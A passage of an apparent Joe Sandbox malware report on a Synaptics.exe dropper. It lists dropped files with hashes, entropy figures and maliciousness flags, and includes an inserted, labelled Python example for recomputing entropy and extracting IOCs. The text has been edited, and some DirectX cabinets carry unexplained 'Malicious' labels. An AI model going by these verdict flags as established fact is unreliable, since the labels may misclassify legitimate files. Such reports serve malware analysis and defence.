                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
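Added worked example, not part of the Joe Sandbox report: the "Entropy (8bit)" field in these records is the Shannon entropy of the file's bytes in bits per byte, and the one dropped file whose full content is visible in its preview (the 26-byte Zone.Identifier stream above) lets you confirm that. The script below parses records in the report's own Key:Value layout, recomputes the entropy of that stream (reconstructed on the assumption that the preview masks CR/LF as dots; where exactly the CR/LF pairs sit does not change the byte histogram, so the value is the same either way), checks it against the reported figure, bounds the metric by log2(size) so that small files are not over-read, and extracts the SHA-256 of every record marked Malicious:true as an IOC list. The excerpt is constructed from two records on this page; the function names are mine.

```python
from __future__ import annotations

import math
from collections import Counter

# Constructed excerpt: two dropped-file records copied from the report above,
# with the leading indentation removed. The report's layout is one "Key:Value"
# line per field, each record starting at its "Process:" line.
REPORT_EXCERPT = """\
Process:C:\\Users\\user\\Desktop\\file.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Process:C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
Category:dropped
Size (bytes):90309
Entropy (8bit):7.986243949537019
Encrypted:false
MD5:B0669F7D395078BEE0087B089F0B45C5
SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
Malicious:false
"""

# The 26-byte Zone.Identifier stream whose preview is shown in the report.
# Assumption: the preview renders CR/LF as dots. Moving the CR/LF pairs around
# does not change the byte histogram, so the entropy is unaffected.
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\nZoneId=0\r\n"
assert len(ZONE_IDENTIFIER) == 26


def parse_records(text: str) -> list[dict[str, str]]:
    """Split report text into one dict per dropped-file record."""
    records: list[dict[str, str]] = []
    current: dict[str, str] | None = None
    for line in text.splitlines():
        key, sep, value = line.strip().partition(":")
        if not sep:
            continue                      # not a Key:Value line
        if key == "Process":              # each record starts with its Process line
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value          # value keeps any further ':' (e.g. "C:\...")
    return records


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, the quantity the report calls 'Entropy (8bit)'."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def max_entropy(size: int) -> float:
    """Largest value the metric can reach for a file of `size` bytes:
    8 bits for large files, only log2(size) for small ones."""
    return min(8.0, math.log2(size)) if size > 1 else 0.0


def entropy_mismatch(record: dict[str, str], content: bytes) -> float:
    """Absolute difference between the reported entropy and a recomputation."""
    return abs(float(record["Entropy (8bit)"]) - shannon_entropy(content))


def malicious_sha256(records: list[dict[str, str]]) -> list[str]:
    """SHA-256 of every record the report marks Malicious:true (IOC list)."""
    return [r["SHA-256"] for r in records if r.get("Malicious") == "true"]


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    print("recomputed entropy :", shannon_entropy(ZONE_IDENTIFIER))
    print("mismatch vs report :", entropy_mismatch(recs[0], ZONE_IDENTIFIER))
    for r in recs:
        size = int(r["Size (bytes)"])
        print(r["SHA-256"], r["Entropy (8bit)"], "bound", round(max_entropy(size), 3))
    print("IOCs:", malicious_sha256(recs))
```

Two caveats the recomputation makes visible. First, a 26-byte file cannot score above log2(26) = 4.70, so the 3.95 reported for the Zone.Identifier stream is close to its ceiling and says nothing about packing; read the entropy field against the size field, not on its own. Second, the DirectX cabinets in this section all sit between 7.98 and 7.9997 because LZX-compressed data is nearly uniform, and the report's "Encrypted" flag flips between 7.986 (false) and 7.991 (true) on this page, so that flag is a threshold heuristic on the same metric and does not distinguish a compressed redistributable from an encrypted payload.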
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1401038
                                                                                              Entropy (8bit):7.999678252363499
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
                                                                                              MD5:5EC6F520F3AFCC6494AB0D43B690EBD4
                                                                                              SHA1:2359E14CB6DA44AA89A3815E905D6FFD81960D02
                                                                                              SHA-256:27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
                                                                                              SHA-512:9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....<......D............................<...#..............{..............44f .d3dx9_30_x64.cat...;........4!e .d3dx9_30.dll.......<....4.d .infinst.exe.&.....=....4.e .apr2006_d3dx9_30_x64.inf.......=....4.e .d3dx9_30_x64.inf..vs..9..[.... ..q..@..$Q.f...>....".}...W].}.uL.E.2H]..T.i%.h-...%ZX.<x{.ZX............GC......|/M...H....zh.n...S.0.I%&....E..Kq..g.....#..!+.....X.<.]..-N..1X.E.qg....6..O....{...Q.."..!"...M..R.ff.]...n...KG.x.T...{.@E1~.{@..+..f..}.EkQ.....B......Gg... ..E0.D.$. ...r.+.;Td4...2..........z..:J%..S.g.Z....._.).*.H...)!...T.....AA..b(.lH..-9&rp....9"r\..s..)........%..._2<..R.t..l>z.;...........3!..U..~..O....!.......\vo.%...q+.B.b2'.....z..W..A...5..B...6..B..B.....v.AZ....(....;.2..8.....M..is..mn.9..]..Ys.X"..&...R....S..........%.o.s./.P4......U..O.'.W...n-&H...(.9*:.x..zT9.(..D{L.....M.-.....N..U....n|.y......{r..Y.I......b.0..P....a..|..F:...)..U9=...g.........!y.........e.w...K.i.\.8Z....O..O.c.\.'...@./..!....aM.<.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90309
                                                                                              Entropy (8bit):7.986243949537019
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
                                                                                              MD5:B0669F7D395078BEE0087B089F0B45C5
                                                                                              SHA1:30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
                                                                                              SHA-256:E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
                                                                                              SHA-512:D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....<......D...............!............<...#.............................44f .xinput1_1_x64.cat..F.........4.d .xinput1_1.dll......e.....4.d .infinst.exe.V....l.....4.e .apr2006_xinput_x64.inf......o.....4.e .xinput1_1_x64.inf.. ...9..CK.{.XSI..MHh..AD.. .7t...4..H.TTB...$.."...,...v].{Y{...u..k.......w..pA..}......<.\.9s.w.9sf.x...}...y..L......j`.c2..6..>..L.i.......F.......QZ...X.p.}c.i.`.,^X/l.8...m._..Fv0.}pOO.................N..>....O 6......X..s....A.'.s0....X...c._0.|...?... .....IM.Ln..e..&..$...6?...K.....f7../.A..2...@=..7.`..L&..u:...w.>...q.q'=&...Sf....'..,.S`R,..aJ..@.nO.6.....TEF+.K...4.-.$....<e........ob.^..\({@).F.A.../.'..I../.F>@}..N.f....h...........q\.7#.~...Rm.2...HO0...{...dx....d..00<.3.v..........d....o:.e...,.....I..^v&.t .O..)Y;.B.7|Q.K....Oo...g.L..5.I.....;t.i.\Z.V..>../..G+.!....z5,.*....1.L..#....58..f....7.x..Va~....bY....\+..U.-M.D..H....d"n{..b.X..V...Lqz..k.h.5..I.d)E..x'.hc.dp.Dr.8E,.(.R..+..5.YZS.1.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701820
                                                                                              Entropy (8bit):7.999560976493214
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
                                                                                              MD5:906318E8C444DAAAEA30550D5024F235
                                                                                              SHA1:3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
                                                                                              SHA-256:1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
                                                                                              SHA-512:0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..........4...=....).........6.. .d3dx10_33_x64.cat.p]...)....l6O. .d3dcompiler_33.dll.h...2.....o6=. .d3dx10_33.dll.h....B.....6.. .infinst.exe.L....T.....6F. .apr2007_d3dx10_33_x64.inf.....NW.....6F. .d3dx10_33_x64.inf......Z.....6F. .d3dx10_33_x64_xp.inf.d7$....[.....@.....P...O...u..AA.?.nE.DW.$.3B..BU.H...!.W..".J.^.IJ$(....hD.......vo?.$ef . t.=.......p.H.P.D&..t@..\..sCb!1i..O...........w................l{......d...-....Q.\.......xCNH....+.%"..;..o..DD..r.4B."...H`.?.P&.....>"(...E..HT.Q....:..e9 .{.j%...e.....$.p..R.....;.%!..>.....G......*.....x.~.@.....H.K....P?.w.^....7.R.RW ../p..w, Y..bu W.r.h.T..$Q.....\z....V_.^..N0=....K~.>.$v.}...y7"!.w...s..@b....~\.ily........Y....l.`.^.?y...w.. ....]..)...R1....... ...#......G...J.F.0x1.6^S>.*/.x..p..............(.B..$.....r.....CO9.R.1..a.a..})..^.h...+.P..}-?Z..H..t....U..gO..M.].l.2..........*.d.N6G...I..=..L=O...........:.....*...... .......2.c.?'.<1..w......?..E
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_28_x64.cat, d3dx9_28.dll, infinst.exe, d3dx9_28_x64.inf, dec2005_d3dx9_28_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
Category:dropped
Size (bytes):216015
Entropy (8bit):7.996946294916653
Encrypted:true
SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
MD5:681407075E9B19E5EF2218832F6FAD71
SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx10_00_x64.cat, d3dx10.dll, infinst.exe, d3dx10_00_x64.inf, dec2006_d3dx10_00_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
Category:dropped
Size (bytes):144891
Entropy (8bit):7.997618513042835
Encrypted:true
SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
MD5:219ABD58672661EA814E3739729DDC04
SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: xact2_5_x64.cat, x3daudio1_1.dll, xactengine2_5.dll, infinst.exe, dec2006_xact_x64.inf, xact2_5_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type:Microsoft Cabinet archive data, many, 1241539 bytes, 4 files, at 0x44 +A "d3dx9_24_x64.cat" +A "d3dx9_24.dll", flags 0x4, ID 4731, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
Category:dropped
Size (bytes):1250707
Entropy (8bit):7.999567218170613
Encrypted:true
SSDEEP:24576:bsacaEhnsKcwXWOBfH7OhvlY2HIbbK09zRy2/TnN75EEvIOiOhpbF:xuzcwXW6YlFIbtN7MOiOh
MD5:DCA673A8F9F834F9370862D1C97FD9E7
SHA1:1A0CF0FDDA2C9E8ABDF5CC19FCDBEAF1BC1639E7
SHA-256:BE3DE63F136A2B41D3229E477CE2CD7F67DED031B4B370E640C39B80368238CF
SHA-512:255270BDBC1DCD6A3213D8F0DA2E48C6445B0141C5148EDD1DABC9CA4643667651694B68013412A4F2EC90CCD60A757F64A9A76E2576C4FCB056DDE726A6F67B
Malicious:true
Preview:MSCF cabinet header; member names in the CFFILE entries: d3dx9_24_x64.cat, d3dx9_24.dll, infinst.exe, d3dx9_24_x64.inf (the remainder is compressed data and not printable)

Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
